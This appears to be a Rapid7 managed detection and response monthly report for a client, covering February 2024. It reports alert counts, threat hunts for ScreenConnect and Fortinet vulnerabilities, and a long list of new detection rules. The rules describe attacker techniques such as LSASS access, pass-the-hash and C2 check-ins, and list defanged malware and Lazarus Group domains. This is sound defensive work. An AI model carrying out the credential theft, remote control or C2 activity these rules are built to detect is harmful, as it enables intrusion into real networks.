Key Service Statistics

Row

Executive Summary

Rapid7’s Managed Detection and Response (MDR) service generated 112 alerts to identify malicious activity in Company Name’s environment in February. MDR did not identify malicious activity which required incident response during this period.

Row

Total Logs collected

3,518,304,611

Alerts Generated

112

Incident Reports

0

Row

Collected Log Data

Alerts Generated

Incident Reports

Row

Collected Log Data

The following table identifies the data sources from which InsightIDR collected logs last month, the log set in InsightIDR log search where the logs are stored, and the number of log files collected per data source. The MDR team uses this data when investigating an incident.

You can also view your logs in InsightIDR by clicking Log Search from the left menu.

Row

Row

Alerts

The MDR Security Operations Center performed in-depth validation of 112 alerts by priority. The MDR team applied user behavior analytics to retrace the user and activity behind each alert. As part of this analysis, the MDR team reviewed domains and URLs accessed by users, processes executed by users, historical logon activity, and system roles associated with the alerts.

For more information about alert priorities and closed alert dispositions, go to the Key Terms and Definitions tab.

Row

Closed Alerts by Priority

Alerts by Priority.

Row

Critical Priority

High Priority

Medium Priority

Low Priority

Row

Critical Priority

High Priority

Medium Priority

Low Priority

Row

List of Closed Alerts

This table lists the alerts that were closed during the month of February. The table is generated by matching signatures to logs and events from the Company Name’s environment.

Row

Closed Alerts by Disposition

Alerts by Disposition.

Row

Not Reported

Reported

Row

Incidents

MDR did not respond to any security incidents during the month of February.

Row

Collected Endpoint Data

Artifact Type Operating System Count
Running Processes Windows 76,344
Prefetch Windows 64,300
Registry-Based Persistence Windows 336,612
Scheduled Tasks Windows 90,827
Services Windows 269,796
Crontab Linux 98
Running Processes Linux 2,814
Sudoers Linux 164
Suid Binaries Linux 700
Kernel Modules Linux 940
Authorized Keys Linux 9,038
Running Processes Mac 1,670
Sudoers Mac 68
Suid Binaries Mac 68
Authorized Keys Mac 5
Crontab Mac 0
Services Mac 2
Kernel Extensions Mac 809

Row

Threat Hunts Performed

During the month of February, MDR’s threat hunters performed 2 hunts in Company Name’s environment. Details of these threat hunts can be found in the table below. If evidence of compromise was identified as a result of these threat hunt(s), our incident response process would have been initiated (see the ‘Incidents’ section of this report).

Hunt Name Hunt Description Hunt Timeframe
Find Running ScreenConnect Versions On February 19, 2024, ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. The two vulnerabilities affect ScreenConnect version 23.9.7 and earlier. At the time of disclosure, neither vulnerability had a CVE assigned. As of February 21st, CVEs have been assigned to both issues mentioned in the ConnectWise’s advisory: CVE-2024-1709: An authentication bypass using an alternate path or channel (CVSS 10) and CVE-2024-1708: A path traversal issue (CVSS 8.4). Upon public disclosures of the two vulnerabilities by ConnectWise, the R7 MDR Threat Hunt team initiated a hunt across the managed customer base to identify the presence of ScreenConnect based on the visibility R7 has through Insight. The hunt was focused on a comprehensive list of assets with specific versions of ScreenConnect to help aid clients with upgrading to patched versions of ScreenConnect. The impacted clients were notified immediately. 2024-02-20 - 2024-02-22
Find Fortinet SSL VPN Appliances On February 8, 2024 Fortinet disclosed multiple critical vulnerabilities affecting FortiOS, the operating system that runs on Fortigate SSL VPNs. The critical vulnerabilities include CVE-2024-21762, an out-of-bounds write vulnerability in SSLVPNd that could allow remote unauthenticated attackers to execute arbitrary code or commands on Fortinet SSL VPNs via specially crafted HTTP requests. Upon public disclosures of the vulnerabilities by Fortinet, the R7 MDR Threat Hunt team initiated a hunt across the managed customer base to identify the presence of FortiOS based on the visibility R7 has through firewall and ingress authentication event logs. The impacted clients were notified immediately. 2024-02-09 - 2024-02-12

Row

Newly Created Rules and Suppressions

In February, Rapid7s MDR’s Threat Intelligence and Detection Engineering (TIDE) team created 376 new detection rules. The TIDE team also implemented 1 suppressions, tuning the rules listed under “Rules with new Suppressions.” Each month, TIDE actively researches new detections to increase coverage, and implements suppressions to raise the fidelity of existing detections which helps cover the Company Name’s environment.

Newly Created Rules

Name Description
Attack Technique: Registry Modification by Black Hunt Ransomware This detection identifies the use of ‘reg.exe’ to change the value of registry keys that resides under the path HKCU. This detection mainly detected registry keys modified by Black Hunt ransomware. The Black Hunt ransomware makes several modifications to the Windows registry to disable security measures, alter system functionality, and potentially limit user control over the system.
Attacker Technique - OpenSSH service installed via PowerShell This detection identifies commands used to install OpenSSH on windows and linux systems. OpenSSH is used to sign-in to systems remotely and securely, it comes pre-installed in some systems and it can also be disabled by default in others, unless a user enables it. Threat Actors may use compromised valid accounts to log into remote machines using OpenSSH.
Attacker Technique - Rundll32 Running DLL in Root of AppData Temp Folder This detection identifies ‘RunDLL32.exe’ executing a DLL file in the root of ProgramData directory. ProgramData is a common staging directory for malicious actors.
Attacker Technique - Rundll32 Running Registered COM Class This detection identifies ‘RunDLL32.exe’ invoking a registered COM class. Malicious Actors were observed installing a COM class and later invoking it to run malicious DLLs.
Attacker Technique - Suspicious Nltest Execution via ScreenConnect On February 19, 2024, ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect versions 23.9.7 and earlier. This detection identifies suspicious command execution coming from ScreenConnect.
This identifies Nltest, which is a Windows utility for interacting with Active Directory Domain Services. It can be used by malicious actors to gather information about an Active Directory network.
Attacker Technique - Suspicious Powershell Execution via ScreenConnect On February 19, 2024, ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect versions 23.9.7 and earlier. This detection identifies Powershell downloading an executable file or executing Invoke-WebRequest module via ScreenConnect.
Attacker Technique: ConnectWise ScreenConnect Exploit Adding a New User On February 19, 2024, ConnectWise disclosed two vulnerabilities in their ScreenConnect remote access software. Both vulnerabilities affect ScreenConnect versions 23.9.7 and earlier. This detection identifies the creation of new files within the path C: as part of the publicly released exploit.
In order for Rapid7 to alert on this rule, customers will have to ensure that a host’s Advanced Security Audit Policy Settings for Kernel Object is configured to log Windows EventID 4663 and have a SACL set on ScreenConnect’s directory. More information on how to configure the Advanced Audit policy is available at:
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn319064(v=ws.11)
Crowdstrike Falcon - A domain lookup matched a CrowdStrike Intelligence indicator A domain lookup matched a CrowdStrike Intelligence indicator.
Crowdstrike Falcon - A domain matched a Custom Intelligence Indicator (Custom IOC) A domain matched a Custom Intelligence Indicator (Custom IOC).
Crowdstrike Falcon - A domain matched a Custom Intelligence Indicator (Custom IOC) with low severity A domain matched a Custom Intelligence Indicator (Custom IOC) with low severity.
Crowdstrike Falcon - A driver was loaded from a suspicious location, by a suspicious process, or in a suspicious manner A driver was loaded from a suspicious location, by a suspicious process, or in a suspicious manner. Check that the driver and loading process is expected.
Crowdstrike Falcon - A file appears to be imitating a standard OS or otherwise benign filename and/or launched from an unusual location A file appears to be imitating a standard OS or otherwise benign filename and/or launched from an unusual location. This might be to masquerade malware. Review the file.
Crowdstrike Falcon - A file with a known ransomware extension was created A file with a known ransomware extension was created.
Crowdstrike Falcon - A file written to the file-system matches CrowdStrike Intelligence’s medium confidence threshold for malicious files A file written to the file-system matches CrowdStrike Intelligence’s medium confidence threshold for malicious files. It might be malware and/or part of an adversary’s toolkit. Review the file.
Crowdstrike Falcon - A file written to the file-system meets the File Analysis ML algorithm’s high-confidence threshold for malware A file written to the file-system meets the File Analysis ML algorithm’s high-confidence threshold for malware.
Crowdstrike Falcon - A file written to the file-system meets the File Analysis ML algorithm’s lowest-confidence threshold for malware A file written to the file-system meets the File Analysis ML algorithm’s lowest-confidence threshold for malware.
Crowdstrike Falcon - A file written to the file-system meets the File Analysis ML algorithm’s medium-confidence threshold for malware A file written to the file-system meets the File Analysis ML algorithm’s medium-confidence threshold for malware.
Crowdstrike Falcon - A file written to the file-system meets the machine learning-based on-sensor AV protection’s lowest-confidence threshold for malicious files A file written to the file-system meets the machine learning-based on-sensor AV protection’s lowest-confidence threshold for malicious files.
Crowdstrike Falcon - A file written to the file-system surpassed a low-confidence adware detection threshold A file written to the file-system surpassed a low-confidence adware detection threshold.
Crowdstrike Falcon - A file written to the file-system surpassed a lowest-confidence adware detection threshold A file written to the file-system surpassed a lowest-confidence adware detection threshold.
Crowdstrike Falcon - A file written to the file-system surpassed a medium-confidence adware detection threshold A file written to the file-system surpassed a medium-confidence adware detection threshold.
Crowdstrike Falcon - A Java application launched from an unusual location A Java application launched from an unusual location. This might be a Java-based remote administration tool (RAT). Investigate the process tree.
Crowdstrike Falcon - A low level detection was triggered on this process for testing purposes A low level detection was triggered on this process for testing purposes.
Crowdstrike Falcon - A machine has been infected and is controlled by a malicious party A machine has been infected and is controlled by a malicious party.
Crowdstrike Falcon - A MD5 hash matched a Custom Intelligence Indicator (Custom IOC) with informational severity A MD5 hash matched a Custom Intelligence Indicator (Custom IOC) with informational severity.
Crowdstrike Falcon - A MD5 hash matched a Custom Intelligence Indicator (Custom IOC) with low severity A MD5 hash matched a Custom Intelligence Indicator (Custom IOC) with low severity.
Crowdstrike Falcon - A plist file was modified A plist file was modified. Adversaries can modify plist files to achieve privilege escalation or establish persistence. Please check the file to determine if the modifications were expected.
Crowdstrike Falcon - A PowerShell process appears to be creating a Windows Management Instrumentation (WMI) class A PowerShell process appears to be creating a Windows Management Instrumentation (WMI) class. Some adversaries store malicious payloads in WMI classes to maintain persistence. Review the process tree and delete the WMI class from the host.
Crowdstrike Falcon - A PowerShell process attempted to load a payload from a registry key A PowerShell process attempted to load a payload from a registry key. The registry key is likely a malicious payload. Investigate the process tree and registry key.
Crowdstrike Falcon - A PowerShell process with suspicious command line arguments launched under an unusual parent process A PowerShell process with suspicious command line arguments launched under an unusual parent process. This is often a malicious dropper. Review the command line.
Crowdstrike Falcon - A PowerShell script related to this process is likely malicious or shares characteristics with known malicious scripts A PowerShell script related to this process is likely malicious or shares characteristics with known malicious scripts. Review the script.
Crowdstrike Falcon - A process appears to have been exploited to facilitate lateral movement between hosts in the environment A process appears to have been exploited to facilitate lateral movement between hosts in the environment. Both hosts should be investigated for further signs of compromise.
Crowdstrike Falcon - A process attempted to create a shell via wscript under Windows Management Instrumentation (WMI) A process attempted to create a shell via wscript under Windows Management Instrumentation (WMI). An adversary can use the shell to execute commands remotely. Review the process tree.
Crowdstrike Falcon - A process attempted to send obfuscated data, possibly to a command and control server A process attempted to send obfuscated data, possibly to a command and control server. Adversaries can use this to blend in with normal network traffic and evade detection. Review the process tree.
Crowdstrike Falcon - A process attempted to uninstall the Falcon sensor using Windows Management Instrumentation (WMI) A process attempted to uninstall the Falcon sensor using Windows Management Instrumentation (WMI). This is an unusual way to uninstall the sensor. If this is unexpected, review the process tree.
Crowdstrike Falcon - A process attempted to write a malicious payload A process attempted to write a malicious payload. Review the process tree.
Crowdstrike Falcon - A process containing a reflectively loaded DLL opened a handle to LSASS A process containing a reflectively loaded DLL opened a handle to LSASS. Adversaries often use this to evade detection. Review the process tree.
Crowdstrike Falcon - A process decoded or otherwise deobfuscated the contents of a file A process decoded or otherwise deobfuscated the contents of a file. Adversaries can use this to shape follow-on behavior. Review the process tree.
Crowdstrike Falcon - A process engaged in network activity with a remote destination known for malicious activity A process engaged in network activity with a remote destination known for malicious activity. Investigate events around the remote connection.
Crowdstrike Falcon - A process has escalated privileges, this could be as a result of an adversary’s attempt to bypass access controls or as part of legitimate system administration A process has escalated privileges, this could be as a result of an adversary’s attempt to bypass access controls or as part of legitimate system administration. Please check the process tree and surrounding events to determine if this activity was expected.
Crowdstrike Falcon - A process has modified the permissions or attributes of a file A process has modified the permissions or attributes of a file. Adversaries may modify file or directory permissions or attributes to evade access control lists (ACLs) and access protected files. Please check the process tree to determine if this modification was expected.
Crowdstrike Falcon - A process has scheduled an unusual task A process has scheduled an unusual task. Some malware schedules tasks to maintain persistence. If this task unexpected, review it.
Crowdstrike Falcon - A process has written a known EICAR test file A process has written a known EICAR test file. Review the files written by the triggered process.
Crowdstrike Falcon - A process launched that shares characteristics with a cryptocurrency miner A process launched that shares characteristics with a cryptocurrency miner. If this is unexpected, review the process tree.
Crowdstrike Falcon - A process launched that’s likely related to a malicious macro from a lure document associated with a phishing attack A process launched that’s likely related to a malicious macro from a lure document associated with a phishing attack. Investigate the process tree to find the originating file and look for similar files delivered to other hosts.
Crowdstrike Falcon - A process launched with a filename, path, and/or arguments associated with known adware A process launched with a filename, path, and/or arguments associated with known adware. If this activity is unexpected, review the file and investigate the host for other signs of adware.
Crowdstrike Falcon - A process made a suspicious remote procedure call (RPC) A process made a suspicious remote procedure call (RPC). Malware abuses RPC to migrate to other processes and evade detection. Review the process tree and locate the origin of the RPC.
Crowdstrike Falcon - A process manually started the sudo password timer A process manually started the sudo password timer
Crowdstrike Falcon - A process modified a firewall rule in an unusual way A process modified a firewall rule in an unusual way. This might provide malware network access to remote command and control. Review the command line.
Crowdstrike Falcon - A process tree contains indications of a phishing attack A process tree contains indications of a phishing attack. An email opened around the time of the activity is likely responsible. Investigate the process tree to find the originating file and look for similar files delivered to other hosts.
Crowdstrike Falcon - A productivity application unexpectedly wrote and ran an executable A productivity application unexpectedly wrote and ran an executable. Review the executable and investigate the process tree.
Crowdstrike Falcon - A script was blocked from running because it matches a hash blacklisted by your prevention policy A script was blocked from running because it matches a hash blacklisted by your prevention policy. For more info, see Configuration > Prevention Hashes.
Crowdstrike Falcon - A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC) A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC).
Crowdstrike Falcon - A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC) with informational severity A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC) with informational severity.
Crowdstrike Falcon - A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC) with low severity A SHA256 hash matched a Custom Intelligence Indicator (Custom IOC) with low severity.
Crowdstrike Falcon - A suspicious process was identified by CrowdStrike A suspicious process was identified by CrowdStrike. Review the process tree.
Crowdstrike Falcon - A suspicious script launched that might be related to malicious activity A suspicious script launched that might be related to malicious activity. A variety of malware families use this technique. Review the script.
Crowdstrike Falcon - A user request to service classified as anomalous behavior pattern based on learned profile and user similarity A user request to service classified as anomalous behavior pattern based on learned profile and user similarity.
Crowdstrike Falcon - Access from blocklisted location Access from blocklisted location
Crowdstrike Falcon - Access from multiple locations concurrently Access from multiple locations concurrently
Crowdstrike Falcon - An application installed itself along with other bundled software An application installed itself along with other bundled software. This process is likely related to adware but might be malicious. Review the applications installed.
Crowdstrike Falcon - An application that doesn’t usually schedule tasks scheduled one An application that doesn’t usually schedule tasks scheduled one. Malware schedule tasks to maintain persistence. If this task is unexpected, investigate the process responsible for scheduling the task.
Crowdstrike Falcon - An executable is running from a location in which no executables should be running An executable is running from a location in which no executables should be running.
Crowdstrike Falcon - An executable ran that contained a right-to-left override character in its file name and was flagged as suspicious An executable ran that contained a right-to-left override character in its file name and was flagged as suspicious.
Crowdstrike Falcon - An executable ran that had a non-executable file extension An executable ran that had a non-executable file extension.
Crowdstrike Falcon - An executable ran that had a suspicious file name containing right-to-left characters An executable ran that had a suspicious file name containing right-to-left characters.
Crowdstrike Falcon - An executable was run with a contradicting file extension An executable was run with a contradicting file extension
Crowdstrike Falcon - An executable was written with a suspicious file name containing a right-to-left override character An executable was written with a suspicious file name containing a right-to-left override character.
Crowdstrike Falcon - An executable was written with a suspicious file name containing whitespace characters before an executable extension An executable was written with a suspicious file name containing whitespace characters before an executable extension.
Crowdstrike Falcon - An executable was written with a suspicious filename containing right-to-left characters An executable was written with a suspicious filename containing right-to-left characters
Crowdstrike Falcon - An executable with trailing white space was executed An executable with trailing white space was executed
Crowdstrike Falcon - An MD5 Hash matched a Custom Intelligence Indicator (Custom IOC) An MD5 Hash matched a Custom Intelligence Indicator (Custom IOC).
Crowdstrike Falcon - An unexpected process ran svchost.exe An unexpected process ran svchost.exe. Adversaries can masquerade malware as a system process to evade detection. Review the executable.
Crowdstrike Falcon - Anomalous certificate-based authentication Anomalous certificate-based authentication
Crowdstrike Falcon - Anomalous RPC (account discovery) Anomalous RPC (account discovery)
Crowdstrike Falcon - Anomalous RPC (remote services) Anomalous RPC (remote services)
Crowdstrike Falcon - Anomalous RPC (scheduled task) Anomalous RPC (scheduled task)
Crowdstrike Falcon - Anomalous RPC (valid accounts) Anomalous RPC (valid accounts)
Crowdstrike Falcon - Credential Scanning (Active Directory) Credential Scanning (Active Directory)
Crowdstrike Falcon - Credential Scanning (web-based) Credential Scanning (web-based)
Crowdstrike Falcon - DC PsExec execution DC PsExec execution
Crowdstrike Falcon - Document Access In A Detection Summary Event
Crowdstrike Falcon - Excessive activity from multiple endpoints Excessive activity from multiple endpoints
Crowdstrike Falcon - Excessive activity to multiple endpoints Excessive activity to multiple endpoints
Crowdstrike Falcon - Executable Written In A Detection Summary Event
Crowdstrike Falcon - Falcon Overwatch has identified suspicious activity Falcon Overwatch has identified suspicious activity. This has been raised for your awareness and should be investigated as normal.
Crowdstrike Falcon - For evaluation only - benign, no action needed For evaluation only - benign, no action needed.
Crowdstrike Falcon - Identity verification approve Identity verification approve
Crowdstrike Falcon - Identity verification denied Identity verification denied
Crowdstrike Falcon - Identity verification timed out Identity verification timed out
Crowdstrike Falcon - Mshta attempted to load a likely malicious command line from a registry entry using an obfuscated script Mshta attempted to load a likely malicious command line from a registry entry using an obfuscated script. Review the script and registry key.
Crowdstrike Falcon - Multiple processes in a session accessed linux data files Multiple processes in a session accessed linux data files. This could be an attempt to access sensitive data. Investigate the session and process tree.
Crowdstrike Falcon - Name or location of a file was manipulated or abused in order to evade detection Name or location of a file was manipulated or abused in order to evade detection. Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users. Please check the process tree to determine if these files are malicious or if this was expected behaviour.
Crowdstrike Falcon - Nslookup was launched in an unusual way Nslookup was launched in an unusual way. An adversary might be using nslookup to map your environment or locate command and control. Investigate the process tree.
Crowdstrike Falcon - NTLM relay activity NTLM relay activity
Crowdstrike Falcon - Password brute force attack (Active Directory) Password brute force attack (Active Directory)
Crowdstrike Falcon - Password brute force attack (web-based) Password brute force attack (web-based)
Crowdstrike Falcon - Policy rule match (access) Policy rule match (access)
Crowdstrike Falcon - Policy rule match (detection) Policy rule match (detection)
Crowdstrike Falcon - Privilege escalation (Azure service principal) Privilege escalation (Azure service principal)
Crowdstrike Falcon - Privilege escalation (endpoint) Privilege escalation (endpoint)
Crowdstrike Falcon - Privilege escalation (user) Privilege escalation (user)
Crowdstrike Falcon - Ransomware file operation activity has been observed occurring over a remote SMB connection Ransomware file operation activity has been observed occurring over a remote SMB connection. Investigate the observed user account for signs of compromise and review the file operations for encryption and data impact.
Crowdstrike Falcon - Rundll32 has likely been abused by malware to launch a malicious payload Rundll32 has likely been abused by malware to launch a malicious payload. While the rundll32 process is benign, the DLL file it’s loading is likely malicious. Review the file loaded by rundll32.
Crowdstrike Falcon - Rundll32 launched a suspended process Rundll32 launched a suspended process. This might be malware hijacking system processes and launching suspended processes as hollowing targets. Investigate the process tree and the source of the injection.
Crowdstrike Falcon - Some activity may indicate start of reconnaissance Some activity may indicate start of reconnaissance
Crowdstrike Falcon - Suspicious domain replication Suspicious domain replication
Crowdstrike Falcon - Suspicious lateral movement Suspicious lateral movement
Crowdstrike Falcon - Suspicious LDAP search (AD-CS reconnaissance) Suspicious LDAP search (AD-CS reconnaissance)
Crowdstrike Falcon - Suspicious LDAP search (Kerberos misconfiguration) Suspicious LDAP search (Kerberos misconfiguration)
Crowdstrike Falcon - Suspicious machine alteration Suspicious machine alteration
Crowdstrike Falcon - Suspicious protocol implementation (pass the hash) Suspicious protocol implementation (pass the hash)
Crowdstrike Falcon - Suspicious protocol implementation (valid accounts) Suspicious protocol implementation (valid accounts)
Crowdstrike Falcon - Svchost launched with unusual arguments Svchost launched with unusual arguments. This occasionally results from applications misusing svchost, but might be malware preparing to hollow out the process or abusing it to launch a malicious payload. Investigate the process tree.
Crowdstrike Falcon - Techniques: Non-Standard Port Techniques: Non-Standard Port
Crowdstrike Falcon - The networksetup tool applied the localhost as a proxy, which is often indicative of a remote man in the middle attack The networksetup tool applied the localhost as a proxy, which is often indicative of a remote man in the middle attack
Crowdstrike Falcon - The runC binary was replaced by a process on the host The runC binary was replaced by a process on the host. Please review the configuration.
Crowdstrike Falcon - The Windows startup folder launched an unusual file The Windows startup folder launched an unusual file. Malware might have previously set persistence by copying a malicious payload to the startup folder. Review the file.
Crowdstrike Falcon - This activity classified as anomalous behavior pattern based on baseline and user similarity This activity classified as anomalous behavior pattern based on baseline and user similarity.
Crowdstrike Falcon - This file meets the Adware/PUP algorithm’s high-confidence threshold This file meets the Adware/PUP algorithm’s high-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP algorithm’s low-confidence threshold This file meets the Adware/PUP algorithm’s low-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP algorithm’s lowest-confidence threshold This file meets the Adware/PUP algorithm’s lowest-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP algorithm’s medium-confidence threshold This file meets the Adware/PUP algorithm’s medium-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP Anti-malware ML algorithm’s high-confidence threshold This file meets the Adware/PUP Anti-malware ML algorithm’s high-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP Anti-malware ML algorithm’s lowest-confidence threshold This file meets the Adware/PUP Anti-malware ML algorithm’s lowest-confidence threshold.
Crowdstrike Falcon - This file meets the Adware/PUP Anti-malware ML algorithm’s medium-confidence threshold This file meets the Adware/PUP Anti-malware ML algorithm’s medium-confidence threshold.
Crowdstrike Falcon - This file meets the Behavioral Analysis ML algorithm’s low-confidence threshold for malware This file meets the Behavioral Analysis ML algorithm’s low-confidence threshold for malware. It might be malicious and/or part of an adversary’s toolkit. Review the file.
Crowdstrike Falcon - This file meets the File Analysis ML algorithm’s lowest-confidence threshold for malware This file meets the File Analysis ML algorithm’s lowest-confidence threshold for malware.
Crowdstrike Falcon - This file meets the File Analysis ML algorithm’s medium-confidence threshold for malware This file meets the File Analysis ML algorithm’s medium-confidence threshold for malware.
Crowdstrike Falcon - This file meets the machine learning-based on-sensor AV protection’s low confidence threshold for Adware/PUP files This file meets the machine learning-based on-sensor AV protection’s low confidence threshold for Adware/PUP files.
Crowdstrike Falcon - This file meets the machine learning-based on-sensor AV protection’s low confidence threshold for malicious files This file meets the machine learning-based on-sensor AV protection’s low confidence threshold for malicious files.
Crowdstrike Falcon - This file meets the machine learning-based on-sensor AV protection’s lowest confidence threshold for Adware/PUP files This file meets the machine learning-based on-sensor AV protection’s lowest confidence threshold for Adware/PUP files.
Crowdstrike Falcon - This file meets the machine learning-based on-sensor AV protection’s medium confidence threshold for malicious files This file meets the machine learning-based on-sensor AV protection’s medium confidence threshold for malicious files.
Crowdstrike Falcon - This file written to disk meets the Behavioral Analysis ML algorithm’s low-confidence threshold for malware This file written to disk meets the Behavioral Analysis ML algorithm’s low-confidence threshold for malware. It might be malicious and/or part of an adversary’s toolkit. Review the file.
Crowdstrike Falcon - This file written to disk meets the machine learning-based on-sensor AV protection’s low confidence threshold for Adware/PUP files This file written to disk meets the machine learning-based on-sensor AV protection’s low confidence threshold for Adware/PUP files.
Crowdstrike Falcon - This file written to disk meets the machine learning-based on-sensor AV protection’s lowest confidence threshold for Adware/PUP files This file written to disk meets the machine learning-based on-sensor AV protection’s lowest confidence threshold for Adware/PUP files.
Crowdstrike Falcon - This SHA256 hash was prevented from executing in accordance with your organization’s policy This SHA256 hash was prevented from executing in accordance with your organization’s policy.
Crowdstrike Falcon - Unusual access to an application Unusual access to an application
Crowdstrike Falcon - Unusual login to an endpoint Unusual login to an endpoint
Crowdstrike Falcon - Unusual service access to an endpoint Unusual service access to an endpoint
Crowdstrike Falcon - Use of stale endpoint Use of stale endpoint
Crowdstrike Falcon - Use of stale user account Use of stale user account
Crowdstrike Falcon - User seen coming from, and accessing to, multiple locations, that is anomalous to the user baseline and to peer users User seen coming from, and accessing to, multiple locations, that is anomalous to the user baseline and to peer users. Such behavior may indicate potential lateral movement, domain reconnaissance, credentials theft and other risks. Falcon monitors the activity and escalates severity if necessary.
Crowdstrike Falcon - Using an advanced attack, the entire domain was compromised Using an advanced attack, the entire domain was compromised. The malicious party can access any resource on the domain.
Crowdstrike Falcon - XDR Detection Summary Event XDR Detection Summary Event
ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 CID Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 DBID Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Echo Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Heartbeat Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Heartbeat Response This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Initial Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Initial Checkin Response This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Tasking Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE BunnyLoader 3.0 Tasking Response This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE DuckTail APT CnC Activity (GET) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE FormBook CnC Checkin (GET) M5 This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Java/Unknown CnC Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Lazarus Group Backdoor CnC Checkin M1 This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Lazarus Group Backdoor CnC Checkin M2 This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Lazarus Group Comebacker Backdoor CnC Checkin This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE MacOS RustDoor Related Activity M1 (POST) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE MacOS RustDoor Related Activity M2 (POST) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Ducktail Domain (123online .uk in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Ducktail Domain (dailyfasterauto .info in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Ducktail Domain (mafiakorea .com in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Ducktail Domain (mountainseagroup3 .top in TLS SNI) This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed KrustyLoader Domain (farstream .org) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed KrustyLoader Domain (sysupdates .org) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lactrodectus Domain in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lactrodectus Domain in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (chrysalisc .com) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (contact .rgssm .in) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (job4writers .com) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (rginfotechnology .com) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (sifucanva .com) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
ET MALWARE Observed Lazarus Group Domain (thefrostery .co .uk) in TLS SNI This detection identifies malware related activity using Rapid7’s Network Traffic Analysis sensor. Malicious actors often use malware in order to gain access to victim organizations.
